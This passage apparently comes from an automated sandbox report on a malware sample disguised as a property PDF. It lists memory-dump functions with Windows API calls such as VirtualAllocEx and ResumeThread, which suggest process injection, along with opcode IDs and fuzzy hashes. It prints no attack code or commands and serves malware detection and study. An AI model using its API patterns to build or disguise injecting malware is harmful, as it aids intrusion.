                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0130D656,?,?,?,?,?), ref: 0130D717
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1788930478.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_1300000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DuplicateHandle
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3793708945-0
                                                                                                                              • Opcode ID: e376b4aef7efb7e3b4a1305bd82b56ea04d8fe551310124353947b3c169761a9
                                                                                                                              • Instruction ID: c9cab7a91c995934b05ebba116c2eecff8b600fd424655d1d2ea39fce9002872
                                                                                                                              • Opcode Fuzzy Hash: e376b4aef7efb7e3b4a1305bd82b56ea04d8fe551310124353947b3c169761a9
                                                                                                                              • Instruction Fuzzy Hash: AB21E4B5D00249DFDB10CFA9D985AEEBBF5EB48324F14841AE918B3350C378A954CF60
                                                                                                                              Function 077249F1 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07724A66
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795597496.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7720000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4275171209-0
                                                                                                                              • Opcode ID: a8993896a62a816be4a66e796b806e6fc334e55de77c2309d78715ac90066952
                                                                                                                              • Instruction ID: b17dc899e7a938652c8791e474689836c55c2a70d7257cd77358cbbba79b5307
                                                                                                                              • Opcode Fuzzy Hash: a8993896a62a816be4a66e796b806e6fc334e55de77c2309d78715ac90066952
                                                                                                                              • Instruction Fuzzy Hash: 62114AB69002899FCB20CFAAC445AEEBFF5AF88320F24841DD559A7250C7759905DF90
                                                                                                                              Function 075007F8 Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,07503402,?,?,?,?,?), ref: 075034A7
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795524867.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 074F0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1795495475.00000000074F0000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_74f0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateFromIconResource
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3668623891-0
                                                                                                                              • Opcode ID: 02944eeb7eceea9aa9e7fcc5ab623088992c11d9874306d280b218847b05b31e
                                                                                                                              • Instruction ID: 9980f0ab7b34aba6a5040dd6714ec5de55b750db34d45b4857e7138b081b6cb7
                                                                                                                              • Opcode Fuzzy Hash: 02944eeb7eceea9aa9e7fcc5ab623088992c11d9874306d280b218847b05b31e
                                                                                                                              • Instruction Fuzzy Hash: 321126B59003499FDB20CF9AD844BEEBFF8EB58320F14845AE914A7250C379A954DFA4
                                                                                                                              Function 077249F8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07724A66
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795597496.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7720000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4275171209-0
                                                                                                                              • Opcode ID: 299c78f501b02071ae408ac49509e1d596f3cc69ebd261511b2c1b40228c1f47
                                                                                                                              • Instruction ID: cf2fa00c6f4d97ca6efec240638e912f2ca616f2603ad88f6f38b14c032c76ae
                                                                                                                              • Opcode Fuzzy Hash: 299c78f501b02071ae408ac49509e1d596f3cc69ebd261511b2c1b40228c1f47
                                                                                                                              • Instruction Fuzzy Hash: 75113AB29002499FDB20DFAAC845AEEBFF5EF88320F148419E519A7250C7759940DFA1
                                                                                                                              Function 07724028 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795597496.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7720000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ResumeThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 947044025-0
                                                                                                                              • Opcode ID: 9e98a5286058f70f0a2b81fae39a08f9f1fe064ca6eafd45a2d4419e0c142bb2
                                                                                                                              • Instruction ID: cf2d1359442c0153c75db786ce12fedd4d998059fd091be3a7a91a909eba8424
                                                                                                                              • Opcode Fuzzy Hash: 9e98a5286058f70f0a2b81fae39a08f9f1fe064ca6eafd45a2d4419e0c142bb2
                                                                                                                              • Instruction Fuzzy Hash: F91176B19002898EDB20CFAAC845BEEFFF4AF88320F24885ED559A7240C7759945CF90
                                                                                                                              Function 07724030 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795597496.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7720000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ResumeThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 947044025-0
                                                                                                                              • Opcode ID: b6be6d2ee0c483b005e47ce3c0b2d00cccd562eb000599c35359130674c2c3ab
                                                                                                                              • Instruction ID: 80d3960766bf0f4c586773060afe96fcf9e6633985f780cba55af5688499fe2a
                                                                                                                              • Opcode Fuzzy Hash: b6be6d2ee0c483b005e47ce3c0b2d00cccd562eb000599c35359130674c2c3ab
                                                                                                                              • Instruction Fuzzy Hash: 1A116AB1D003498FCB20DFAAC4457AEFBF4EF88320F248859D519A7240C775A944CBA0
                                                                                                                              Function 077291C8 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0772922D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795597496.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7720000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePost
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 410705778-0
                                                                                                                              • Opcode ID: ce98e24e9818d5c701ab29885bbe749fe2b1f954ba13d26e06e6432d31aff642
                                                                                                                              • Instruction ID: 45119f1c90588af0c5b2f89908c0a7e25cc90aca675301c0a35dea4e1dfdbc87
                                                                                                                              • Opcode Fuzzy Hash: ce98e24e9818d5c701ab29885bbe749fe2b1f954ba13d26e06e6432d31aff642
                                                                                                                              • Instruction Fuzzy Hash: 621125B58003599FCB10CF99D585BEEBFF4EB48324F248459E519B3210C3B4A545DFA1
                                                                                                                              Function 0130AF98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0130AFFE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1788930478.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_1300000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleModule
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4139908857-0
                                                                                                                              • Opcode ID: 2dfe972d7e9deff9440c55093aa7bc3a16d818aad940758a93c9fe964d57cef2
                                                                                                                              • Instruction ID: 6f8301db9e9f161c245a2b553503643ec688b8ea1f6947af93b575c1874eac93
                                                                                                                              • Opcode Fuzzy Hash: 2dfe972d7e9deff9440c55093aa7bc3a16d818aad940758a93c9fe964d57cef2
                                                                                                                              • Instruction Fuzzy Hash: 5B110FB6C003498FDB20CF9AC844B9EFBF4AB88324F14845AD528A7250C3B9A545CFA1
                                                                                                                              Function 07724754 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0772922D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795597496.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7720000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePost
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 410705778-0
                                                                                                                              • Opcode ID: 219d1640dd1dfba17a6f81a8fd50d377ce9b2369b207bd9b91cf9d636a6c39b3
                                                                                                                              • Instruction ID: 36f0a254ee37285c3ac78d864fd5bcd1df6f3d46423f4aca52f7120cf9843414
                                                                                                                              • Opcode Fuzzy Hash: 219d1640dd1dfba17a6f81a8fd50d377ce9b2369b207bd9b91cf9d636a6c39b3
                                                                                                                              • Instruction Fuzzy Hash: FB11F5B58003599FCB10DF9AD585BDEBBF8EB48320F248459E518B7200C375A944CFA1
                                                                                                                              Function 012AD4C4 Relevance: .1, Instructions: 75COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1787297677.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_12ad000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 41a185be0f3d4d4d2eef38d4daa5a133dedbc804a7c85ed081ccebab3f67f8f6
                                                                                                                              • Instruction ID: 4092348d27e849779b0865696b3c064740396358849eab21ceb3e3ead7fc2d21
                                                                                                                              • Opcode Fuzzy Hash: 41a185be0f3d4d4d2eef38d4daa5a133dedbc804a7c85ed081ccebab3f67f8f6
                                                                                                                              • Instruction Fuzzy Hash: 6B2167B1514208DFCB15DF58E9C0F26BF65FB88318F64C56DE9490B656C336D406CBA1
                                                                                                                              Function 012AD3D8 Relevance: .1, Instructions: 75COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1787297677.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_12ad000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0d0ff00f677ec9e0e98a4f5c520e508e944e3be9d78413f5da1434845eee9e4c
                                                                                                                              • Instruction ID: 4deb73475c7ed9233a7c6bec45d4dd29be3f2ab382f54fc7af66db4ce93fcdd1
                                                                                                                              • Opcode Fuzzy Hash: 0d0ff00f677ec9e0e98a4f5c520e508e944e3be9d78413f5da1434845eee9e4c
                                                                                                                              • Instruction Fuzzy Hash: C02167B5114208DFDB05DF48C9C0B66BF65FB88324F60C56DEA0A0B656C33AE446CBA1
                                                                                                                              Function 012BD01C Relevance: .1, Instructions: 72COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1787358385.00000000012BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012BD000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_12bd000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a927a99f54ee0456222de902c7d8cb7a40a956626219ef5678c3f1cafa5abc6b
                                                                                                                              • Instruction ID: f362ded343b978d25b1c83a99e33c30475a0b26da64a302cbb2d3ec263d178bb
                                                                                                                              • Opcode Fuzzy Hash: a927a99f54ee0456222de902c7d8cb7a40a956626219ef5678c3f1cafa5abc6b
                                                                                                                              • Instruction Fuzzy Hash: 1B214575514208DFCB15CF58D4C0BA2BF65FB84398F24C96DD90A0B242C33AD407CA61
                                                                                                                              Function 012BD1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1787358385.00000000012BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012BD000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_12bd000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0cd1d1575c27c1df0a71111464a5653ba93b5df5bbeb62e3c9d421333e9ffc37
                                                                                                                              • Instruction ID: 3788e34005d502bb5b31fa37107d3cddb89fe29ad86e50e2326fac50989387ba
                                                                                                                              • Opcode Fuzzy Hash: 0cd1d1575c27c1df0a71111464a5653ba93b5df5bbeb62e3c9d421333e9ffc37
                                                                                                                              • Instruction Fuzzy Hash: 142149B5514248EFDB05DF98C5C0BA6BB65FB84368F20C56DE9094B253C376D806CB61
                                                                                                                              Function 012BD006 Relevance: .1, Instructions: 63COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1787358385.00000000012BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012BD000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_12bd000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 9dc629817f1b9c138753e6aeb285a796fee2ea49d622dc374a758eb821a4b7aa
                                                                                                                              • Instruction ID: 9cf7b8923a0e0ee62e581403dbcee46c93d0163209be1b47c6d459233c75f1ac
                                                                                                                              • Opcode Fuzzy Hash: 9dc629817f1b9c138753e6aeb285a796fee2ea49d622dc374a758eb821a4b7aa
                                                                                                                              • Instruction Fuzzy Hash: FF21AF714083849FCB02CF24D994B51BF71EB46318F28C5DAD9498B2A7C33A980ACB62
                                                                                                                              Function 012AD4BF Relevance: .1, Instructions: 56COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1787297677.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_12ad000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                                                                              • Instruction ID: 3272e6546d717d0db018ae64ee110a926d027bb5910cb3edb241893721872f58
                                                                                                                              • Opcode Fuzzy Hash: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                                                                              • Instruction Fuzzy Hash: 97112676404284CFCB12CF54D5C4B16BF72FB84318F24C6A9D9490B657C33AD45ACBA1
                                                                                                                              Function 012AD3D3 Relevance: .1, Instructions: 56COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1787297677.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_12ad000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                                                                              • Instruction ID: ae963066419ed5df478eb7057a93e45e9ed966c8889bc4469248c6c059362898
                                                                                                                              • Opcode Fuzzy Hash: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                                                                              • Instruction Fuzzy Hash: 25112676404284CFDB12CF44D5C4B56BF72FB84324F24C2A9DA090B657C33AE45ACBA1
                                                                                                                              Function 012BD1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1787358385.00000000012BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012BD000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_12bd000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                                                              • Instruction ID: 56e00d900f18d43958bae5d48f959c47033232b44fafd7be7e947182136d6971
                                                                                                                              • Opcode Fuzzy Hash: 244c614e04a80719a4cbb1e35d09afbc7f52f2045db6f081cea45e42cbbeead8
                                                                                                                              • Instruction Fuzzy Hash: 5911BB75504284DFDB12CF54C5C0B55BFA2FB84328F24C6AAD9494B697C33AD44ACB61

                                                                                                                              Non-executed Functions

                                                                                                                              Function 074F4D3B Relevance: 1.0, Instructions: 975COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795495475.00000000074F0000.00000004.08000000.00040000.00000000.sdmp, Offset: 074F0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1795524867.0000000007500000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_74f0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2e3d80e92c94b04800db846ddc33c5071c363f571cc418160d6b7630bf53a888
                                                                                                                              • Instruction ID: cb40059b7296fd092994a9fc04808c9c48aa75e2f97a195aea8cfc7daeaea51b
                                                                                                                              • Opcode Fuzzy Hash: 2e3d80e92c94b04800db846ddc33c5071c363f571cc418160d6b7630bf53a888
                                                                                                                              • Instruction Fuzzy Hash: CBA2B17148E3C18FC7578B7088B55817FF0AE1322475E85EFD4C58E4A3E2AE585ACB62
                                                                                                                              Function 052F0040 Relevance: .3, Instructions: 315COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1793745865.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_52f0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 881bcc39901ef9fe9376ddae5f81f77c06ef19d874b3ddb58b3ffcac023ba007
                                                                                                                              • Instruction ID: 018aa561e92741b40002f3069a57ff16dca654097b3a08628f6f5a78b624459d
                                                                                                                              • Opcode Fuzzy Hash: 881bcc39901ef9fe9376ddae5f81f77c06ef19d874b3ddb58b3ffcac023ba007
                                                                                                                              • Instruction Fuzzy Hash: 671295F0D81B458AD710CF25EA4C3893BB1B755398BF04B09D2617A2E5DBB825AACF44
                                                                                                                              Function 07722400 Relevance: .3, Instructions: 312COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795597496.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7720000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e1e52b73a27c3b9744b15a1efd12311662a90e77f4e496a6e963aafb298db122
                                                                                                                              • Instruction ID: 14057b4d3217f75f9d62ebec03e574423803cb58b88da18d0814ba3bab9bac3a
                                                                                                                              • Opcode Fuzzy Hash: e1e52b73a27c3b9744b15a1efd12311662a90e77f4e496a6e963aafb298db122
                                                                                                                              • Instruction Fuzzy Hash: B3E108B4E041598FCB14DFA9C5809AEBBB2FF89304F24D169D814AB356D731AD42CF60
                                                                                                                              Function 077240E0 Relevance: .3, Instructions: 312COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795597496.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7720000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 446a831bf977fc9c23383164ca270513d03329cb4655eb9cc7004ba72e82df11
                                                                                                                              • Instruction ID: 6e3f4b69f5801fc40a6b0c913438892367113561e48264b455d93740493548f3
                                                                                                                              • Opcode Fuzzy Hash: 446a831bf977fc9c23383164ca270513d03329cb4655eb9cc7004ba72e82df11
                                                                                                                              • Instruction Fuzzy Hash: 9EE1E8B4E041698FCB14DFA9C5809AEFBF2BF89344F249169D814AB356D731AD42CF60
                                                                                                                              Function 07721FC8 Relevance: .3, Instructions: 312COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795597496.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7720000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5cd169678074772e570ca522eaf02793ba3c06e779d344b742eae3a465cc3c08
                                                                                                                              • Instruction ID: 30f68641b7ceb38f14a2560e2925a71be64b9d1fef3000b0603ff92bf7a53c83
                                                                                                                              • Opcode Fuzzy Hash: 5cd169678074772e570ca522eaf02793ba3c06e779d344b742eae3a465cc3c08
                                                                                                                              • Instruction Fuzzy Hash: C5E1FBB4E041598FCB14DFA9C9809AEFBB2BF89304F24D169D814AB356D731AD42DF60
                                                                                                                              Function 07721B90 Relevance: .3, Instructions: 312COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795597496.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7720000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 53d40c24e64b91622bf0ecb49744b11a6c4f6cea45c54f588ff6cca83c050b21
                                                                                                                              • Instruction ID: 5c901fe7ab1cc2b5114d3cc389f74382bb3cc5f1577ab251b1a9ffeea08198f3
                                                                                                                              • Opcode Fuzzy Hash: 53d40c24e64b91622bf0ecb49744b11a6c4f6cea45c54f588ff6cca83c050b21
                                                                                                                              • Instruction Fuzzy Hash: 17E1FAB4E001698FCB14DFA9C5809AEFBB2BF89305F64D169D814AB356D731AD42CF60
                                                                                                                              Function 07722838 Relevance: .3, Instructions: 312COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795597496.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7720000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c943b79bee39216ca02d9d83300869b4579f3b212a8c24e796083e35edfcb6ff
                                                                                                                              • Instruction ID: 5381397de13cf3a55538bca57914a3d2e86134730b9fd29d859c7a865a511491
                                                                                                                              • Opcode Fuzzy Hash: c943b79bee39216ca02d9d83300869b4579f3b212a8c24e796083e35edfcb6ff
                                                                                                                              • Instruction Fuzzy Hash: 82E1EAB5E001598FCB14DFA9C580AAEFBB2BF49304F24D169D814AB356D731AD82DF60
                                                                                                                              Function 0130D5BC Relevance: .3, Instructions: 264COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1788930478.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_1300000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 88ede250e484c330a43659957ab4501358c0e06d0a615bd8ac8d1ae3bb2788ac
                                                                                                                              • Instruction ID: 8c8a0f7cc20afd949aa736af7d792026dc09019113d753d19c993e14ebf8e36d
                                                                                                                              • Opcode Fuzzy Hash: 88ede250e484c330a43659957ab4501358c0e06d0a615bd8ac8d1ae3bb2788ac
                                                                                                                              • Instruction Fuzzy Hash: 2DA17232E00219CFCF1ADFB8C85059EBBF6FF85304B15456AE905AB2A5DB31E915CB80
                                                                                                                              Function 052F0006 Relevance: .2, Instructions: 239COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1793745865.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_52f0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 9b6043030245ac5881cc49e7c69782d285c07968d0117a491f39b478fc71faa8
                                                                                                                              • Instruction ID: 2319eef29842c75eaccafd1d3b32114027102cd14b13c3e48e9c769d559de10a
                                                                                                                              • Opcode Fuzzy Hash: 9b6043030245ac5881cc49e7c69782d285c07968d0117a491f39b478fc71faa8
                                                                                                                              • Instruction Fuzzy Hash: 6DC128B1C81B458BD710CF25EA483897BB1BB953A4FB04B09D1617B2E5DBB434AACF44
                                                                                                                              Function 07721B81 Relevance: .1, Instructions: 136COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795597496.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7720000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5a055932e944947d03dc6d1cff5e2c43def1b9d5ead1074c35d9d14292978a87
                                                                                                                              • Instruction ID: f9629a5d5dffcb9f775b67ab32ced443a60c3415723a9821ac84b5cd077d72c9
                                                                                                                              • Opcode Fuzzy Hash: 5a055932e944947d03dc6d1cff5e2c43def1b9d5ead1074c35d9d14292978a87
                                                                                                                              • Instruction Fuzzy Hash: 3C511CB5E012598FDB14CFA9C5805AEFBF2BF89304F24D169D418AB316D7319A42CF61
                                                                                                                              Function 077223F1 Relevance: .1, Instructions: 134COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795597496.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7720000_Re property pdf.jbxd
